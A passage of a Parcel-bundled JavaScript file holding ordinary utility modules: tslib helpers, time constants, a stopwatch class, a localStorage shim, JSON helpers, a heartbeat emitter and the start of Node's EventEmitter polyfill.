function $parcel$export(e, n, v, s) {
  Object.defineProperty(e, n, {get: v, set: s, enumerable: true, configurable: true});
}
var $parcel$global =
typeof globalThis !== 'undefined'
  ? globalThis
  : typeof self !== 'undefined'
  ? self
  : typeof window !== 'undefined'
  ? window
  : typeof global !== 'undefined'
  ? global
  : {};
function $parcel$exportWildcard(dest, source) {
  Object.keys(source).forEach(function(key) {
    if (key === 'default' || key === '__esModule' || dest.hasOwnProperty(key)) {
      return;
    }

    Object.defineProperty(dest, key, {
      enumerable: true,
      get: function get() {
        return source[key];
      }
    });
  });

  return dest;
}
function $parcel$interopDefault(a) {
  return a && a.__esModule ? a.default : a;
}
var $parcel$modules = {};
var $parcel$inits = {};

var parcelRequire = $parcel$global["parcelRequire0dbb"];
if (parcelRequire == null) {
  parcelRequire = function(id) {
    if (id in $parcel$modules) {
      return $parcel$modules[id].exports;
    }
    if (id in $parcel$inits) {
      var init = $parcel$inits[id];
      delete $parcel$inits[id];
      var module = {id: id, exports: {}};
      $parcel$modules[id] = module;
      init.call(module.exports, module, module.exports);
      return module.exports;
    }
    var err = new Error("Cannot find module '" + id + "'");
    err.code = 'MODULE_NOT_FOUND';
    throw err;
  };

  parcelRequire.register = function register(id, init) {
    $parcel$inits[id] = init;
  };

  $parcel$global["parcelRequire0dbb"] = parcelRequire;
}
parcelRequire.register("kjyEk", function(module, exports) {
"use strict";

});

parcelRequire.register("9EePZ", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});

var $7WQrb = parcelRequire("7WQrb");

$7WQrb.__exportStar((parcelRequire("fUPCt")), module.exports);

$7WQrb.__exportStar((parcelRequire("3NXE9")), module.exports);

});
parcelRequire.register("7WQrb", function(module, exports) {

$parcel$export(module.exports, "__awaiter", () => $5c96a02c592fcff1$export$1050f835b63b671e);
$parcel$export(module.exports, "__exportStar", () => $5c96a02c592fcff1$export$f33643c0debef087);
$parcel$export(module.exports, "__importDefault", () => $5c96a02c592fcff1$export$da59b14a69baef04);
/*! *****************************************************************************
Copyright (c) Microsoft Corporation.

Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted.

THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
PERFORMANCE OF THIS SOFTWARE.
***************************************************************************** */ /* global Reflect, Promise */ var $5c96a02c592fcff1$var$extendStatics = function(d, b) {
    $5c96a02c592fcff1$var$extendStatics = Object.setPrototypeOf || ({
        __proto__: []
    }) instanceof Array && function(d, b) {
        d.__proto__ = b;
    } || function(d, b) {
        for(var p in b)if (b.hasOwnProperty(p)) d[p] = b[p];
    };
    return $5c96a02c592fcff1$var$extendStatics(d, b);
};
function $5c96a02c592fcff1$export$a8ba968b8961cb8a(d, b) {
    $5c96a02c592fcff1$var$extendStatics(d, b);
    function __() {
        this.constructor = d;
    }
    d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __());
}
var $5c96a02c592fcff1$export$18ce0697a983be9b = function() {
    $5c96a02c592fcff1$export$18ce0697a983be9b = Object.assign || function __assign(t) {
        for(var s, i = 1, n = arguments.length; i < n; i++){
            s = arguments[i];
            for(var p in s)if (Object.prototype.hasOwnProperty.call(s, p)) t[p] = s[p];
        }
        return t;
    };
    return $5c96a02c592fcff1$export$18ce0697a983be9b.apply(this, arguments);
};
function $5c96a02c592fcff1$export$3c9a16f847548506(s, e) {
    var t = {};
    for(var p in s)if (Object.prototype.hasOwnProperty.call(s, p) && e.indexOf(p) < 0) t[p] = s[p];
    if (s != null && typeof Object.getOwnPropertySymbols === "function") {
        for(var i = 0, p = Object.getOwnPropertySymbols(s); i < p.length; i++)if (e.indexOf(p[i]) < 0 && Object.prototype.propertyIsEnumerable.call(s, p[i])) t[p[i]] = s[p[i]];
    }
    return t;
}
function $5c96a02c592fcff1$export$29e00dfd3077644b(decorators, target, key, desc) {
    var c = arguments.length, r = c < 3 ? target : desc === null ? desc = Object.getOwnPropertyDescriptor(target, key) : desc, d;
    if (typeof Reflect === "object" && typeof Reflect.decorate === "function") r = Reflect.decorate(decorators, target, key, desc);
    else for(var i = decorators.length - 1; i >= 0; i--)if (d = decorators[i]) r = (c < 3 ? d(r) : c > 3 ? d(target, key, r) : d(target, key)) || r;
    return c > 3 && r && Object.defineProperty(target, key, r), r;
}
function $5c96a02c592fcff1$export$d5ad3fd78186038f(paramIndex, decorator) {
    return function(target, key) {
        decorator(target, key, paramIndex);
    };
}
function $5c96a02c592fcff1$export$f1db080c865becb9(metadataKey, metadataValue) {
    if (typeof Reflect === "object" && typeof Reflect.metadata === "function") return Reflect.metadata(metadataKey, metadataValue);
}
function $5c96a02c592fcff1$export$1050f835b63b671e(thisArg, _arguments, P, generator) {
    function adopt(value) {
        return value instanceof P ? value : new P(function(resolve) {
            resolve(value);
        });
    }
    return new (P || (P = Promise))(function(resolve, reject) {
        function fulfilled(value) {
            try {
                step(generator.next(value));
            } catch (e) {
                reject(e);
            }
        }
        function rejected(value) {
            try {
                step(generator["throw"](value));
            } catch (e) {
                reject(e);
            }
        }
        function step(result) {
            result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected);
        }
        step((generator = generator.apply(thisArg, _arguments || [])).next());
    });
}
function $5c96a02c592fcff1$export$67ebef60e6f28a6(thisArg, body) {
    var _ = {
        label: 0,
        sent: function() {
            if (t[0] & 1) throw t[1];
            return t[1];
        },
        trys: [],
        ops: []
    }, f, y, t, g;
    return g = {
        next: verb(0),
        "throw": verb(1),
        "return": verb(2)
    }, typeof Symbol === "function" && (g[Symbol.iterator] = function() {
        return this;
    }), g;
    function verb(n) {
        return function(v) {
            return step([
                n,
                v
            ]);
        };
    }
    function step(op) {
        if (f) throw new TypeError("Generator is already executing.");
        while(_)try {
            if (f = 1, y && (t = op[0] & 2 ? y["return"] : op[0] ? y["throw"] || ((t = y["return"]) && t.call(y), 0) : y.next) && !(t = t.call(y, op[1])).done) return t;
            if (y = 0, t) op = [
                op[0] & 2,
                t.value
            ];
            switch(op[0]){
                case 0:
                case 1:
                    t = op;
                    break;
                case 4:
                    _.label++;
                    return {
                        value: op[1],
                        done: false
                    };
                case 5:
                    _.label++;
                    y = op[1];
                    op = [
                        0
                    ];
                    continue;
                case 7:
                    op = _.ops.pop();
                    _.trys.pop();
                    continue;
                default:
                    if (!(t = _.trys, t = t.length > 0 && t[t.length - 1]) && (op[0] === 6 || op[0] === 2)) {
                        _ = 0;
                        continue;
                    }
                    if (op[0] === 3 && (!t || op[1] > t[0] && op[1] < t[3])) {
                        _.label = op[1];
                        break;
                    }
                    if (op[0] === 6 && _.label < t[1]) {
                        _.label = t[1];
                        t = op;
                        break;
                    }
                    if (t && _.label < t[2]) {
                        _.label = t[2];
                        _.ops.push(op);
                        break;
                    }
                    if (t[2]) _.ops.pop();
                    _.trys.pop();
                    continue;
            }
            op = body.call(thisArg, _);
        } catch (e) {
            op = [
                6,
                e
            ];
            y = 0;
        } finally{
            f = t = 0;
        }
        if (op[0] & 5) throw op[1];
        return {
            value: op[0] ? op[1] : void 0,
            done: true
        };
    }
}
function $5c96a02c592fcff1$export$45d3717a4c69092e(o, m, k, k2) {
    if (k2 === undefined) k2 = k;
    o[k2] = m[k];
}
function $5c96a02c592fcff1$export$f33643c0debef087(m, exports) {
    for(var p in m)if (p !== "default" && !exports.hasOwnProperty(p)) exports[p] = m[p];
}
function $5c96a02c592fcff1$export$19a8beecd37a4c45(o) {
    var s = typeof Symbol === "function" && Symbol.iterator, m = s && o[s], i = 0;
    if (m) return m.call(o);
    if (o && typeof o.length === "number") return {
        next: function() {
            if (o && i >= o.length) o = void 0;
            return {
                value: o && o[i++],
                done: !o
            };
        }
    };
    throw new TypeError(s ? "Object is not iterable." : "Symbol.iterator is not defined.");
}
function $5c96a02c592fcff1$export$8d051b38c9118094(o, n) {
    var m = typeof Symbol === "function" && o[Symbol.iterator];
    if (!m) return o;
    var i = m.call(o), r, ar = [], e;
    try {
        while((n === void 0 || n-- > 0) && !(r = i.next()).done)ar.push(r.value);
    } catch (error) {
        e = {
            error: error
        };
    } finally{
        try {
            if (r && !r.done && (m = i["return"])) m.call(i);
        } finally{
            if (e) throw e.error;
        }
    }
    return ar;
}
function $5c96a02c592fcff1$export$afc72e2116322959() {
    for(var ar = [], i = 0; i < arguments.length; i++)ar = ar.concat($5c96a02c592fcff1$export$8d051b38c9118094(arguments[i]));
    return ar;
}
function $5c96a02c592fcff1$export$6388937ca91ccae8() {
    for(var s = 0, i = 0, il = arguments.length; i < il; i++)s += arguments[i].length;
    for(var r = Array(s), k = 0, i = 0; i < il; i++)for(var a = arguments[i], j = 0, jl = a.length; j < jl; j++, k++)r[k] = a[j];
    return r;
}
function $5c96a02c592fcff1$export$10c90e4f7922046c(v) {
    return this instanceof $5c96a02c592fcff1$export$10c90e4f7922046c ? (this.v = v, this) : new $5c96a02c592fcff1$export$10c90e4f7922046c(v);
}
function $5c96a02c592fcff1$export$e427f37a30a4de9b(thisArg, _arguments, generator) {
    if (!Symbol.asyncIterator) throw new TypeError("Symbol.asyncIterator is not defined.");
    var g = generator.apply(thisArg, _arguments || []), i, q = [];
    return i = {}, verb("next"), verb("throw"), verb("return"), i[Symbol.asyncIterator] = function() {
        return this;
    }, i;
    function verb(n) {
        if (g[n]) i[n] = function(v) {
            return new Promise(function(a, b) {
                q.push([
                    n,
                    v,
                    a,
                    b
                ]) > 1 || resume(n, v);
            });
        };
    }
    function resume(n, v) {
        try {
            step(g[n](v));
        } catch (e) {
            settle(q[0][3], e);
        }
    }
    function step(r) {
        r.value instanceof $5c96a02c592fcff1$export$10c90e4f7922046c ? Promise.resolve(r.value.v).then(fulfill, reject) : settle(q[0][2], r);
    }
    function fulfill(value) {
        resume("next", value);
    }
    function reject(value) {
        resume("throw", value);
    }
    function settle(f, v) {
        if (f(v), q.shift(), q.length) resume(q[0][0], q[0][1]);
    }
}
function $5c96a02c592fcff1$export$bbd80228419bb833(o) {
    var i, p;
    return i = {}, verb("next"), verb("throw", function(e) {
        throw e;
    }), verb("return"), i[Symbol.iterator] = function() {
        return this;
    }, i;
    function verb(n, f) {
        i[n] = o[n] ? function(v) {
            return (p = !p) ? {
                value: $5c96a02c592fcff1$export$10c90e4f7922046c(o[n](v)),
                done: n === "return"
            } : f ? f(v) : v;
        } : f;
    }
}
function $5c96a02c592fcff1$export$e3b29a3d6162315f(o) {
    if (!Symbol.asyncIterator) throw new TypeError("Symbol.asyncIterator is not defined.");
    var m = o[Symbol.asyncIterator], i;
    return m ? m.call(o) : (o = typeof $5c96a02c592fcff1$export$19a8beecd37a4c45 === "function" ? $5c96a02c592fcff1$export$19a8beecd37a4c45(o) : o[Symbol.iterator](), i = {}, verb("next"), verb("throw"), verb("return"), i[Symbol.asyncIterator] = function() {
        return this;
    }, i);
    function verb(n) {
        i[n] = o[n] && function(v) {
            return new Promise(function(resolve, reject) {
                v = o[n](v), settle(resolve, reject, v.done, v.value);
            });
        };
    }
    function settle(resolve, reject, d, v) {
        Promise.resolve(v).then(function(v) {
            resolve({
                value: v,
                done: d
            });
        }, reject);
    }
}
function $5c96a02c592fcff1$export$4fb47efe1390b86f(cooked, raw) {
    if (Object.defineProperty) Object.defineProperty(cooked, "raw", {
        value: raw
    });
    else cooked.raw = raw;
    return cooked;
}
function $5c96a02c592fcff1$export$c21735bcef00d192(mod) {
    if (mod && mod.__esModule) return mod;
    var result = {};
    if (mod != null) {
        for(var k in mod)if (Object.hasOwnProperty.call(mod, k)) result[k] = mod[k];
    }
    result.default = mod;
    return result;
}
function $5c96a02c592fcff1$export$da59b14a69baef04(mod) {
    return mod && mod.__esModule ? mod : {
        default: mod
    };
}
function $5c96a02c592fcff1$export$d5dcaf168c640c35(receiver, privateMap) {
    if (!privateMap.has(receiver)) throw new TypeError("attempted to get private field on non-instance");
    return privateMap.get(receiver);
}
function $5c96a02c592fcff1$export$d40a35129aaff81f(receiver, privateMap, value) {
    if (!privateMap.has(receiver)) throw new TypeError("attempted to set private field on non-instance");
    privateMap.set(receiver, value);
    return value;
}

});

parcelRequire.register("fUPCt", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.delay = void 0;
function $b964208cf0e7f449$var$delay(timeout) {
    return new Promise((resolve)=>{
        setTimeout(()=>{
            resolve(true);
        }, timeout);
    });
}
module.exports.delay = $b964208cf0e7f449$var$delay;

});

parcelRequire.register("3NXE9", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.fromMiliseconds = module.exports.toMiliseconds = void 0;

var $2MWZl = parcelRequire("2MWZl");
function $2c543746c4e25c3a$var$toMiliseconds(seconds) {
    return seconds * $2MWZl.ONE_THOUSAND;
}
module.exports.toMiliseconds = $2c543746c4e25c3a$var$toMiliseconds;
function $2c543746c4e25c3a$var$fromMiliseconds(miliseconds) {
    return Math.floor(miliseconds / $2MWZl.ONE_THOUSAND);
}
module.exports.fromMiliseconds = $2c543746c4e25c3a$var$fromMiliseconds;

});
parcelRequire.register("2MWZl", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});

var $7WQrb = parcelRequire("7WQrb");

$7WQrb.__exportStar((parcelRequire("lfr75")), module.exports);

$7WQrb.__exportStar((parcelRequire("1qmVT")), module.exports);

});
parcelRequire.register("lfr75", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.ONE_THOUSAND = module.exports.ONE_HUNDRED = void 0;
module.exports.ONE_HUNDRED = 100;
module.exports.ONE_THOUSAND = 1000;

});

parcelRequire.register("1qmVT", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.ONE_YEAR = module.exports.FOUR_WEEKS = module.exports.THREE_WEEKS = module.exports.TWO_WEEKS = module.exports.ONE_WEEK = module.exports.THIRTY_DAYS = module.exports.SEVEN_DAYS = module.exports.FIVE_DAYS = module.exports.THREE_DAYS = module.exports.ONE_DAY = module.exports.TWENTY_FOUR_HOURS = module.exports.TWELVE_HOURS = module.exports.SIX_HOURS = module.exports.THREE_HOURS = module.exports.ONE_HOUR = module.exports.SIXTY_MINUTES = module.exports.THIRTY_MINUTES = module.exports.TEN_MINUTES = module.exports.FIVE_MINUTES = module.exports.ONE_MINUTE = module.exports.SIXTY_SECONDS = module.exports.THIRTY_SECONDS = module.exports.TEN_SECONDS = module.exports.FIVE_SECONDS = module.exports.ONE_SECOND = void 0;
module.exports.ONE_SECOND = 1;
module.exports.FIVE_SECONDS = 5;
module.exports.TEN_SECONDS = 10;
module.exports.THIRTY_SECONDS = 30;
module.exports.SIXTY_SECONDS = 60;
module.exports.ONE_MINUTE = module.exports.SIXTY_SECONDS;
module.exports.FIVE_MINUTES = module.exports.ONE_MINUTE * 5;
module.exports.TEN_MINUTES = module.exports.ONE_MINUTE * 10;
module.exports.THIRTY_MINUTES = module.exports.ONE_MINUTE * 30;
module.exports.SIXTY_MINUTES = module.exports.ONE_MINUTE * 60;
module.exports.ONE_HOUR = module.exports.SIXTY_MINUTES;
module.exports.THREE_HOURS = module.exports.ONE_HOUR * 3;
module.exports.SIX_HOURS = module.exports.ONE_HOUR * 6;
module.exports.TWELVE_HOURS = module.exports.ONE_HOUR * 12;
module.exports.TWENTY_FOUR_HOURS = module.exports.ONE_HOUR * 24;
module.exports.ONE_DAY = module.exports.TWENTY_FOUR_HOURS;
module.exports.THREE_DAYS = module.exports.ONE_DAY * 3;
module.exports.FIVE_DAYS = module.exports.ONE_DAY * 5;
module.exports.SEVEN_DAYS = module.exports.ONE_DAY * 7;
module.exports.THIRTY_DAYS = module.exports.ONE_DAY * 30;
module.exports.ONE_WEEK = module.exports.SEVEN_DAYS;
module.exports.TWO_WEEKS = module.exports.ONE_WEEK * 2;
module.exports.THREE_WEEKS = module.exports.ONE_WEEK * 3;
module.exports.FOUR_WEEKS = module.exports.ONE_WEEK * 4;
module.exports.ONE_YEAR = module.exports.ONE_DAY * 365;

});




parcelRequire.register("iD73S", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.Watch = void 0;
class $d90158c308dd266b$var$Watch {
    constructor(){
        this.timestamps = new Map();
    }
    start(label) {
        if (this.timestamps.has(label)) throw new Error(`Watch already started for label: ${label}`);
        this.timestamps.set(label, {
            started: Date.now()
        });
    }
    stop(label) {
        const timestamp = this.get(label);
        if (typeof timestamp.elapsed !== "undefined") throw new Error(`Watch already stopped for label: ${label}`);
        const elapsed = Date.now() - timestamp.started;
        this.timestamps.set(label, {
            started: timestamp.started,
            elapsed: elapsed
        });
    }
    get(label) {
        const timestamp = this.timestamps.get(label);
        if (typeof timestamp === "undefined") throw new Error(`No timestamp found for label: ${label}`);
        return timestamp;
    }
    elapsed(label) {
        const timestamp = this.get(label);
        const elapsed = timestamp.elapsed || Date.now() - timestamp.started;
        return elapsed;
    }
}
module.exports.Watch = $d90158c308dd266b$var$Watch;
module.exports.default = $d90158c308dd266b$var$Watch;

});

parcelRequire.register("dTXLC", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});

var $7WQrb = parcelRequire("7WQrb");

$7WQrb.__exportStar((parcelRequire("b5rRE")), module.exports);

});
parcelRequire.register("b5rRE", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.IWatch = void 0;
class $8125c6986ecca435$var$IWatch {
}
module.exports.IWatch = $8125c6986ecca435$var$IWatch;

});


parcelRequire.register("bKt7V", function(module, exports) {
"use strict";
(function() {
    "use strict";
    let db;
    function LocalStorage() {}
    db = LocalStorage;
    db.prototype.getItem = function(key) {
        if (this.hasOwnProperty(key)) return String(this[key]);
        return null;
    };
    db.prototype.setItem = function(key, val) {
        this[key] = String(val);
    };
    db.prototype.removeItem = function(key) {
        delete this[key];
    };
    db.prototype.clear = function() {
        const self = this;
        Object.keys(self).forEach(function(key) {
            self[key] = undefined;
            delete self[key];
        });
    };
    db.prototype.key = function(i) {
        i = i || 0;
        return Object.keys(this)[i];
    };
    db.prototype.__defineGetter__("length", function() {
        return Object.keys(this).length;
    });
    if (typeof $parcel$global !== "undefined" && $parcel$global.localStorage) module.exports = $parcel$global.localStorage;
    else if (typeof window !== "undefined" && window.localStorage) module.exports = window.localStorage;
    else module.exports = new LocalStorage();
})();

});

parcelRequire.register("57Lgo", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.IKeyValueStorage = void 0;
class $3bb244b70aa66fad$var$IKeyValueStorage {
}
module.exports.IKeyValueStorage = $3bb244b70aa66fad$var$IKeyValueStorage;

});

parcelRequire.register("3ycQJ", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.parseEntry = void 0;

var $lT07n = parcelRequire("lT07n");
function $295e83bbcb24cf7b$var$parseEntry(entry) {
    var _a;
    return [
        entry[0],
        $lT07n.safeJsonParse((_a = entry[1]) !== null && _a !== void 0 ? _a : "")
    ];
}
module.exports.parseEntry = $295e83bbcb24cf7b$var$parseEntry;

});
parcelRequire.register("lT07n", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
function $feeed37a0b619d8b$var$safeJsonParse(value) {
    if (typeof value !== "string") throw new Error(`Cannot safe json parse value of type ${typeof value}`);
    try {
        return JSON.parse(value);
    } catch (_a) {
        return value;
    }
}
module.exports.safeJsonParse = $feeed37a0b619d8b$var$safeJsonParse;
function $feeed37a0b619d8b$var$safeJsonStringify(value) {
    return typeof value === "string" ? value : JSON.stringify(value, (key, value)=>typeof value === "undefined" ? null : value);
}
module.exports.safeJsonStringify = $feeed37a0b619d8b$var$safeJsonStringify;

});


parcelRequire.register("48YDT", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.HeartBeat = void 0;

var $7WQrb = parcelRequire("7WQrb");

var $7etJZ = parcelRequire("7etJZ");

var $aG48A = parcelRequire("aG48A");

var $5nu18 = parcelRequire("5nu18");

var $1nGZv = parcelRequire("1nGZv");
class $3046f31a17013644$var$HeartBeat extends $5nu18.IHeartBeat {
    constructor(opts){
        super(opts);
        this.events = new $7etJZ.EventEmitter();
        this.interval = $1nGZv.HEARTBEAT_INTERVAL;
        this.interval = (opts === null || opts === void 0 ? void 0 : opts.interval) || $1nGZv.HEARTBEAT_INTERVAL;
    }
    static init(opts) {
        return $7WQrb.__awaiter(this, void 0, void 0, function*() {
            const heartbeat = new $3046f31a17013644$var$HeartBeat(opts);
            yield heartbeat.init();
            return heartbeat;
        });
    }
    init() {
        return $7WQrb.__awaiter(this, void 0, void 0, function*() {
            yield this.initialize();
        });
    }
    stop() {
        clearInterval(this.intervalRef);
    }
    on(event, listener) {
        this.events.on(event, listener);
    }
    once(event, listener) {
        this.events.once(event, listener);
    }
    off(event, listener) {
        this.events.off(event, listener);
    }
    removeListener(event, listener) {
        this.events.removeListener(event, listener);
    }
    initialize() {
        return $7WQrb.__awaiter(this, void 0, void 0, function*() {
            this.intervalRef = setInterval(()=>this.pulse(), $aG48A.toMiliseconds(this.interval));
        });
    }
    pulse() {
        this.events.emit($1nGZv.HEARTBEAT_EVENTS.pulse);
    }
}
module.exports.HeartBeat = $3046f31a17013644$var$HeartBeat;

});
parcelRequire.register("7etJZ", function(module, exports) {
// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to permit
// persons to whom the Software is furnished to do so, subject to the
// following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
// USE OR OTHER DEALINGS IN THE SOFTWARE.
"use strict";
var $5440e9199a418654$var$R = typeof Reflect === "object" ? Reflect : null;
var $5440e9199a418654$var$ReflectApply = $5440e9199a418654$var$R && typeof $5440e9199a418654$var$R.apply === "function" ? $5440e9199a418654$var$R.apply : function ReflectApply(target, receiver, args) {
    return Function.prototype.apply.call(target, receiver, args);
};
var $5440e9199a418654$var$ReflectOwnKeys;
if ($5440e9199a418654$var$R && typeof $5440e9199a418654$var$R.ownKeys === "function") $5440e9199a418654$var$ReflectOwnKeys = $5440e9199a418654$var$R.ownKeys;
else if (Object.getOwnPropertySymbols) $5440e9199a418654$var$ReflectOwnKeys = function ReflectOwnKeys(target) {
    return Object.getOwnPropertyNames(target).concat(Object.getOwnPropertySymbols(target));
};
else $5440e9199a418654$var$ReflectOwnKeys = function ReflectOwnKeys(target) {
    return Object.getOwnPropertyNames(target);
};
function $5440e9199a418654$var$ProcessEmitWarning(warning) {
    if (console && console.warn) console.warn(warning);
}
var $5440e9199a418654$var$NumberIsNaN = Number.isNaN || function NumberIsNaN(value) {
    return value !== value;
};
function $5440e9199a418654$var$EventEmitter() {
    $5440e9199a418654$var$EventEmitter.init.call(this);
}
module.exports = $5440e9199a418654$var$EventEmitter;
module.exports.once = $5440e9199a418654$var$once;
// Backwards-compat with node 0.10.x
$5440e9199a418654$var$EventEmitter.EventEmitter = $5440e9199a418654$var$EventEmitter;
$5440e9199a418654$var$EventEmitter.prototype._events = undefined;
$5440e9199a418654$var$EventEmitter.prototype._eventsCount = 0;
$5440e9199a418654$var$EventEmitter.prototype._maxListeners = undefined;
// By default EventEmitters will print a warning if more than 10 listeners are
// added to it. This is a useful default which helps finding memory leaks.
var $5440e9199a418654$var$defaultMaxListeners = 10;
function $5440e9199a418654$var$checkListener(listener) {
    if (typeof listener !== "function") throw new TypeError('The "listener" argument must be of type Function. Received type ' + typeof listener);
}
Object.defineProperty($5440e9199a418654$var$EventEmitter, "defaultMaxListeners", {
    enumerable: true,
    get: function() {
        return $5440e9199a418654$var$defaultMaxListeners;
    },
    set: function(arg) {
        if (typeof arg !== "number" || arg < 0 || $5440e9199a418654$var$NumberIsNaN(arg)) throw new RangeError('The value of "defaultMaxListeners" is out of range. It must be a non-negative number. Received ' + arg + ".");
        $5440e9199a418654$var$defaultMaxListeners = arg;
    }
});
$5440e9199a418654$var$EventEmitter.init = function() {
    if (this._events === undefined || this._events === Object.getPrototypeOf(this)._events) {
        this._events = Object.create(null);
        this._eventsCount = 0;
    }
    this._maxListeners = this._maxListeners || undefined;
};
// Obviously not all Emitters should be limited to 10. This function allows
// that to be increased. Set to zero for unlimited.
$5440e9199a418654$var$EventEmitter.prototype.setMaxListeners = function setMaxListeners(n) {
    if (typeof n !== "number" || n < 0 || $5440e9199a418654$var$NumberIsNaN(n)) throw new RangeError('The value of "n" is out of range. It must be a non-negative number. Received ' + n + ".");
    this._maxListeners = n;
    return this;
};
function $5440e9199a418654$var$_getMaxListeners(that) {
    if (that._maxListeners === undefined) return $5440e9199a418654$var$EventEmitter.defaultMaxListeners;
    return that._maxListeners;
}
$5440e9199a418654$var$EventEmitter.prototype.getMaxListeners = function getMaxListeners() {
    return $5440e9199a418654$var$_getMaxListeners(this);
};
$5440e9199a418654$var$EventEmitter.prototype.emit = function emit(type) {
    var args = [];
    for(var i = 1; i < arguments.length; i++)args.push(arguments[i]);
    var doError = type === "error";
    var events = this._events;
    if (events !== undefined) doError = doError && events.error === undefined;
    else if (!doError) return false;
    // If there is no 'error' event listener then throw.
    if (doError) {
        var er;
        if (args.length > 0) er = args[0];
        if (er instanceof Error) // Note: The comments on the `throw` lines are intentional, they show
        // up in Node's output if this results in an unhandled exception.
        throw er; // Unhandled 'error' event
        // At least give some kind of context to the user
        var err = new Error("Unhandled error." + (er ? " (" + er.message + ")" : ""));
        err.context = er;
        throw err; // Unhandled 'error' event
    }
    var handler = events[type];
    if (handler === undefined) return false;
    if (typeof handler === "function") $5440e9199a418654$var$ReflectApply(handler, this, args);
    else {
        var len = handler.length;
        var listeners = $5440e9199a418654$var$arrayClone(handler, len);
        for(var i = 0; i < len; ++i)$5440e9199a418654$var$ReflectApply(listeners[i], this, args);
    }
    return true;
};
function $5440e9199a418654$var$_addListener(target, type, listener, prepend) {
    var m;
    var events;
    var existing;
    $5440e9199a418654$var$checkListener(listener);
    events = target._events;
    if (events === undefined) {
        events = target._events = Object.create(null);
        target._eventsCount = 0;
    } else {
        // To avoid recursion in the case that type === "newListener"! Before
        // adding it to the listeners, first emit "newListener".
        if (events.newListener !== undefined) {
            target.emit("newListener", type, listener.listener ? listener.listener : listener);
            // Re-assign `events` because a newListener handler could have caused the
            // this._events to be assigned to a new object
            events = target._events;
        }
        existing = events[type];
    }
    if (existing === undefined) {
        // Optimize the case of one listener. Don't need the extra array object.
        existing = events[type] = listener;
        ++target._eventsCount;
    } else {
        if (typeof existing === "function") // Adding the second element, need to change to array.
        existing = events[type] = prepend ? [
            listener,
            existing
        ] : [
            existing,
            listener
        ];
        else if (prepend) existing.unshift(listener);
        else existing.push(listener);
        // Check for listener leak
        m = $5440e9199a418654$var$_getMaxListeners(target);
        if (m > 0 && existing.length > m && !existing.warned) {
            existing.warned = true;
            // No error code for this since it is a Warning
            // eslint-disable-next-line no-restricted-syntax
            var w = new Error("Possible EventEmitter memory leak detected. " + existing.length + " " + String(type) + " listeners " + "added. Use emitter.setMaxListeners() to " + "increase limit");
            w.name = "MaxListenersExceededWarning";
            w.emitter = target;
            w.type = type;
            w.count = existing.length;
            $5440e9199a418654$var$ProcessEmitWarning(w);
        }
    }
    return target;
}
$5440e9199a418654$var$EventEmitter.prototype.addListener = function addListener(type, listener) {
    return $5440e9199a418654$var$_addListener(this, type, listener, false);
};
$5440e9199a418654$var$EventEmitter.prototype.on = $5440e9199a418654$var$EventEmitter.prototype.addListener;
$5440e9199a418654$var$EventEmitter.prototype.prependListener = function prependListener(type, listener) {
    return $5440e9199a418654$var$_addListener(this, type, listener, true);
};
function $5440e9199a418654$var$onceWrapper() {
    if (!this.fired) {
        this.target.removeListener(this.type, this.wrapFn);
        this.fired = true;
        if (arguments.length === 0) return this.listener.call(this.target);
        return this.listener.apply(this.target, arguments);
    }
}
function $5440e9199a418654$var$_onceWrap(target, type, listener) {
    var state = {
        fired: false,
        wrapFn: undefined,
        target: target,
        type: type,
        listener: listener
    };
    var wrapped = $5440e9199a418654$var$onceWrapper.bind(state);
    wrapped.listener = listener;
    state.wrapFn = wrapped;
    return wrapped;
}
$5440e9199a418654$var$EventEmitter.prototype.once = function once(type, listener) {
    $5440e9199a418654$var$checkListener(listener);
    this.on(type, $5440e9199a418654$var$_onceWrap(this, type, listener));
    return this;
};
